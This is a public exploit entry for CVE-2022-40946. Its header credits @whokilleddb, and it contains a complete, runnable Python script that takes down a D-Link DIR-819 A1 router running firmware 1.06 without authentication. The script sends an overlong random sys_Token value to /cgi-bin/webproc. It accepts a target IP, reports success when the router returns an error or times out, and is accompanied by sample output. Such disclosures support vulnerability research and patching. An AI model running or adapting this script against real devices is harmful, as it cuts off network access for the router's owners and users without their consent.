# Exploit Title: DLink DIR 819 A1 - Denial of Service 
# Date: 30th September, 2022
# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
# Tested on: Firmware Version - 1.06 Hardware Version - A1
# CVE : CVE-2022-40946
#
# Github: https://github.com/whokilleddb/dlink-dir-819-dos
#
# $ ./exploit.py -i 192.168.0.1                         
# [+] DLink DIR-819 DoS exploit
# [i] Address to attack: 192.168.0.1
# [i] Using SSL:         False
# [i] Request Timeout:   30s
# [i] Buffer Length:     19
# [i] Payload:           http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
# [+] Exploit Successful!

#!/usr/bin/env python3
import sys
import string
import urllib3
import requests
import argparse
import random
import socket
from rich import print


# Disable SSL Warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Globals
TIMEOUT = 30
#BUFFER_LEN = 19
BUFFER_LEN = 32

# Class to exploit
class Exploit:
    def __init__(self, ip, is_ssl):
        """Initialize the constructor"""

        self.ip = ip
        self.is_ssl = is_ssl
 
        _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"

        if self.is_ssl:
            self.payload = f"https://{_payload}"
        else:
            self.payload = f"http://{_payload}"


    def show(self):
        """Show the parameters"""

        print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Using SSL:         [green]{self.is_ssl}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Request Timeout:   [green]{TIMEOUT}s[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Buffer Length:     [green]{BUFFER_LEN}[/green][/bold]")
        print(f"[bold][[cyan]i[/cyan]] Payload:           [green]{self.payload}[/green][/bold]")


    def run(self):
        """Run the exploit"""
        print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
        self.show()

        try:
            r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
            if "Internal Error" in r.text:
                print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
                print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
            else:
                print(f"[bold][[red]![/red]] Exploit Failed :([/bold]") 

        except requests.exceptions.Timeout:
            print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
            
        except Exception as e:
            print(f"Error occured as: {e}")
            

def main():
    """Main function to run"""

    parser = argparse.ArgumentParser(
        description="DLink DIR-819 Unauthenticated DoS")
    parser.add_argument('-i', '--ip', required=True, help="IP of the router")
    parser.add_argument('-s', '--ssl', required=False, action="store_true")

    opts = parser.parse_args()
    
    try:
        ip = socket.gethostbyname(opts.ip)
    except socket.error:
        print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
        return

    is_ssl = opts.ssl

    exploit = Exploit(ip, is_ssl)
    exploit.run()


if __name__ == '__main__':
    main()